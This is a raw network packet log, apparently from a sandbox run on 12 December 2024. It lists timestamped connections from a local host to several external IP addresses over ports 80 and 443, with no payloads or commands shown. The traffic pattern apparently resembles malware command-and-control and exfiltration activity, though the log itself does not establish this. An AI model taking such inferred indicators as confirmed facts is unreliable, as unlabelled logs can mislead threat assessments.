Dec 12, 2024 16:48:25.466976881 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.467158079 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.467196941 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.468107939 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.468152046 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.468203068 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.468242884 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.469317913 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.469357967 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.469423056 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.469464064 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.470489979 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.470534086 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.470618963 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.470659018 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.471693993 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.471740961 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.471829891 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.471868038 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.472904921 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.472953081 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.472985029 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.473027945 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.474086046 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.474140882 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.474169970 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.474210024 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.475263119 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.475322962 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.475382090 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.475429058 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.476480007 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.476525068 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.476552963 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.476597071 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.477665901 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.477713108 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.477720976 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.477767944 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.478871107 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.478918076 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.479053974 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.479096889 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.480082035 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.480185986 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.554251909 CET	443	49883	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:25.554333925 CET	49883	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:25.554362059 CET	443	49883	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:25.554403067 CET	49883	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:25.556803942 CET	443	49883	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:25.556852102 CET	49883	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:25.609888077 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.609929085 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.609951019 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.609976053 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.610373020 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.610423088 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.610491991 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.610539913 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.611644983 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.611700058 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.611705065 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.611745119 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.612783909 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.612826109 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.612869978 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.612910032 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.614145994 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.614197969 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.614202023 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.614239931 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.615195990 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.615251064 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.615287066 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.615334034 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.616439104 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.616491079 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.616547108 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.616590023 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.617553949 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.617604017 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.626625061 CET	443	49883	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:25.626668930 CET	49883	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:25.630485058 CET	443	49883	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:25.630530119 CET	49883	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:25.630548000 CET	443	49883	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:25.630605936 CET	49883	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:25.636207104 CET	443	49883	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:25.636251926 CET	49883	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:25.644198895 CET	443	49883	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:25.644247055 CET	49883	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:25.645545959 CET	443	49883	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:25.645586967 CET	49883	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:25.653395891 CET	443	49883	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:25.653439999 CET	49883	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:25.655309916 CET	443	49883	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:25.655375004 CET	49883	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:25.662640095 CET	443	49883	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:25.662695885 CET	49883	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:25.669084072 CET	443	49883	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:25.669132948 CET	49883	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:25.673078060 CET	443	49883	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:25.673248053 CET	49883	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:25.682637930 CET	443	49883	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:25.682696104 CET	49883	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:25.685786963 CET	443	49883	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:25.685847044 CET	49883	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:25.696342945 CET	443	49883	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:25.696434975 CET	49883	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:25.701020002 CET	443	49883	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:25.701071978 CET	49883	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:25.711184978 CET	443	49883	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:25.711250067 CET	49883	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:25.714070082 CET	443	49883	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:25.714123011 CET	49883	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:25.723843098 CET	443	49883	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:25.723898888 CET	49883	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:25.727008104 CET	443	49883	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:25.727065086 CET	49883	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:25.737858057 CET	443	49883	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:25.737921000 CET	49883	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:25.740354061 CET	443	49883	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:25.740401030 CET	49883	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:25.752921104 CET	443	49883	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:25.752975941 CET	49883	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:25.753602028 CET	443	49883	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:25.753645897 CET	49883	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:25.764754057 CET	443	49883	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:25.764880896 CET	49883	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:25.791987896 CET	443	49883	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:25.792124987 CET	49883	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:25.792145967 CET	443	49883	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:25.792191982 CET	49883	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:25.792382002 CET	443	49895	34.117.59.81	192.168.2.10
Dec 12, 2024 16:48:25.792450905 CET	49895	443	192.168.2.10	34.117.59.81
Dec 12, 2024 16:48:25.796765089 CET	49895	443	192.168.2.10	34.117.59.81
Dec 12, 2024 16:48:25.796772957 CET	443	49895	34.117.59.81	192.168.2.10
Dec 12, 2024 16:48:25.797175884 CET	443	49895	34.117.59.81	192.168.2.10
Dec 12, 2024 16:48:25.797259092 CET	49895	443	192.168.2.10	34.117.59.81
Dec 12, 2024 16:48:25.797663927 CET	49895	443	192.168.2.10	34.117.59.81
Dec 12, 2024 16:48:25.818881035 CET	443	49883	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:25.818954945 CET	49883	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:25.818989038 CET	443	49883	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:25.819039106 CET	49883	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:25.821994066 CET	443	49883	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:25.822047949 CET	49883	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:25.822067976 CET	443	49883	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:25.822195053 CET	49883	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:25.827018976 CET	443	49883	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:25.827143908 CET	49883	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:25.830112934 CET	443	49883	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:25.830167055 CET	49883	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:25.830183983 CET	443	49883	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:25.830231905 CET	49883	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:25.839090109 CET	443	49883	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:25.839149952 CET	443	49883	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:25.839169025 CET	49883	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:25.839184999 CET	443	49883	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:25.839199066 CET	49883	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:25.839334965 CET	49883	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:25.843322992 CET	443	49895	34.117.59.81	192.168.2.10
Dec 12, 2024 16:48:25.849338055 CET	443	49883	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:25.849572897 CET	49883	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:25.849582911 CET	443	49883	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:25.849643946 CET	49883	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:25.860402107 CET	443	49883	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:25.860488892 CET	49883	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:25.860498905 CET	443	49883	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:25.860548973 CET	49883	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:25.870244980 CET	443	49883	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:25.870323896 CET	49883	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:25.870393991 CET	443	49883	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:25.870511055 CET	49883	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:25.880449057 CET	443	49883	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:25.880518913 CET	49883	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:25.880528927 CET	443	49883	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:25.880563021 CET	49883	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:25.890479088 CET	443	49883	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:25.890548944 CET	49883	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:25.890558958 CET	443	49883	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:25.890662909 CET	49883	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:25.900635004 CET	443	49883	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:25.900685072 CET	49883	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:25.900692940 CET	443	49883	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:25.900760889 CET	49883	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:25.910639048 CET	443	49883	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:25.910758972 CET	49883	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:25.910818100 CET	443	49883	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:25.911113024 CET	49883	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:25.920432091 CET	443	49883	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:25.920543909 CET	49883	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:25.920591116 CET	443	49883	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:25.920650959 CET	49883	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:25.930072069 CET	443	49883	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:25.930160999 CET	49883	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:25.930272102 CET	443	49883	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:25.930313110 CET	49883	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:25.939341068 CET	443	49883	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:25.939394951 CET	49883	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:25.939403057 CET	443	49883	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:25.939487934 CET	49883	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:25.948185921 CET	443	49883	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:25.948299885 CET	49883	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:25.948307991 CET	443	49883	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:25.949449062 CET	49883	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:25.957042933 CET	443	49883	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:25.957164049 CET	49883	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:25.957174063 CET	443	49883	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:25.959332943 CET	49883	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:25.959338903 CET	443	49883	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:25.959549904 CET	49883	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:25.965147972 CET	443	49883	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:25.965203047 CET	49883	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:25.966473103 CET	443	49883	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:25.966751099 CET	49883	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:25.973606110 CET	443	49883	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:25.973901987 CET	49883	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:25.974853992 CET	443	49883	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:25.975195885 CET	49883	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:25.979794025 CET	443	49883	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:25.981710911 CET	49883	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:25.981719017 CET	443	49883	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:25.982489109 CET	49883	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:25.986545086 CET	443	49883	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:25.986583948 CET	49883	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:25.987903118 CET	443	49883	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:25.988198042 CET	49883	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:25.992399931 CET	443	49883	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:25.992486954 CET	49883	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:25.993752003 CET	443	49883	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:25.993823051 CET	49883	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:25.998841047 CET	443	49883	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:25.998889923 CET	49883	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:26.000101089 CET	443	49883	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:26.000150919 CET	49883	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:26.010714054 CET	443	49883	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:26.010761023 CET	49883	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:26.011926889 CET	443	49883	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:26.011970997 CET	49883	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:26.012449026 CET	443	49883	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:26.012494087 CET	49883	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:26.015372992 CET	443	49883	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:26.015443087 CET	49883	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:26.018918037 CET	443	49883	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:26.018981934 CET	49883	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:26.020241022 CET	443	49883	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:26.020279884 CET	49883	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:26.021536112 CET	443	49883	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:26.021581888 CET	49883	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:26.023494959 CET	443	49883	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:26.023542881 CET	49883	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:26.026777029 CET	443	49883	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:26.026958942 CET	49883	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:26.028105974 CET	443	49883	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:26.028165102 CET	49883	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:26.032104969 CET	443	49883	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:26.032150984 CET	49883	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:26.032157898 CET	443	49883	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:26.032202005 CET	49883	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:26.037406921 CET	443	49883	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:26.037458897 CET	49883	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:26.037466049 CET	443	49883	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:26.037591934 CET	49883	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:26.042372942 CET	443	49883	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:26.042438030 CET	49883	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:26.042444944 CET	443	49883	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:26.042494059 CET	49883	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:26.047509909 CET	443	49883	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:26.047571898 CET	49883	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:26.047602892 CET	443	49883	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:26.047648907 CET	49883	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:26.052326918 CET	443	49883	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:26.052431107 CET	49883	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:26.052438021 CET	443	49883	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:26.052505016 CET	49883	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:26.057595968 CET	443	49883	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:26.057660103 CET	49883	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:26.057670116 CET	443	49883	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:26.058072090 CET	49883	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:26.062269926 CET	443	49883	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:26.062323093 CET	49883	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:26.062897921 CET	443	49883	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:26.062974930 CET	49883	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:26.067256927 CET	443	49883	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:26.067329884 CET	49883	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:26.067338943 CET	443	49883	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:26.067377090 CET	49883	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:26.072490931 CET	443	49883	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:26.072545052 CET	49883	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:26.072730064 CET	443	49883	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:26.072920084 CET	49883	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:26.077008963 CET	443	49883	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:26.077091932 CET	49883	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:26.077101946 CET	443	49883	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:26.077266932 CET	49883	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:26.083023071 CET	443	49883	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:26.083157063 CET	49883	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:26.083180904 CET	443	49883	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:26.083224058 CET	49883	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:26.086505890 CET	443	49883	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:26.086587906 CET	49883	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:26.086698055 CET	443	49883	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:26.086788893 CET	49883	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:26.086788893 CET	49883	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:26.086833954 CET	443	49883	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:26.086906910 CET	49883	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:26.175517082 CET	49900	443	192.168.2.10	34.117.59.81
Dec 12, 2024 16:48:26.175580025 CET	443	49900	34.117.59.81	192.168.2.10
Dec 12, 2024 16:48:26.178704977 CET	49900	443	192.168.2.10	34.117.59.81
Dec 12, 2024 16:48:26.178991079 CET	49900	443	192.168.2.10	34.117.59.81
Dec 12, 2024 16:48:26.179012060 CET	443	49900	34.117.59.81	192.168.2.10
Dec 12, 2024 16:48:26.246812105 CET	443	49895	34.117.59.81	192.168.2.10
Dec 12, 2024 16:48:26.246896982 CET	443	49895	34.117.59.81	192.168.2.10
Dec 12, 2024 16:48:26.246896029 CET	49895	443	192.168.2.10	34.117.59.81
Dec 12, 2024 16:48:26.246948004 CET	49895	443	192.168.2.10	34.117.59.81
Dec 12, 2024 16:48:26.247600079 CET	49895	443	192.168.2.10	34.117.59.81
Dec 12, 2024 16:48:26.247615099 CET	443	49895	34.117.59.81	192.168.2.10
Dec 12, 2024 16:48:26.432367086 CET	49903	443	192.168.2.10	149.154.167.220
Dec 12, 2024 16:48:26.432410955 CET	443	49903	149.154.167.220	192.168.2.10
Dec 12, 2024 16:48:26.432563066 CET	49903	443	192.168.2.10	149.154.167.220
Dec 12, 2024 16:48:26.433229923 CET	49903	443	192.168.2.10	149.154.167.220
Dec 12, 2024 16:48:26.433243036 CET	443	49903	149.154.167.220	192.168.2.10
Dec 12, 2024 16:48:26.451813936 CET	443	49896	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:26.451889038 CET	49896	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:26.457684040 CET	49896	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:26.457695007 CET	443	49896	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:26.458226919 CET	443	49896	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:26.458420038 CET	49896	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:26.458743095 CET	49896	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:26.503334045 CET	443	49896	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:27.391022921 CET	443	49900	34.117.59.81	192.168.2.10
Dec 12, 2024 16:48:27.391097069 CET	49900	443	192.168.2.10	34.117.59.81
Dec 12, 2024 16:48:27.399626017 CET	49900	443	192.168.2.10	34.117.59.81
Dec 12, 2024 16:48:27.399631023 CET	443	49900	34.117.59.81	192.168.2.10
Dec 12, 2024 16:48:27.399861097 CET	443	49900	34.117.59.81	192.168.2.10
Dec 12, 2024 16:48:27.400027037 CET	49900	443	192.168.2.10	34.117.59.81
Dec 12, 2024 16:48:27.401802063 CET	49900	443	192.168.2.10	34.117.59.81
Dec 12, 2024 16:48:27.447329044 CET	443	49900	34.117.59.81	192.168.2.10
Dec 12, 2024 16:48:27.802099943 CET	443	49903	149.154.167.220	192.168.2.10
Dec 12, 2024 16:48:27.802216053 CET	49903	443	192.168.2.10	149.154.167.220
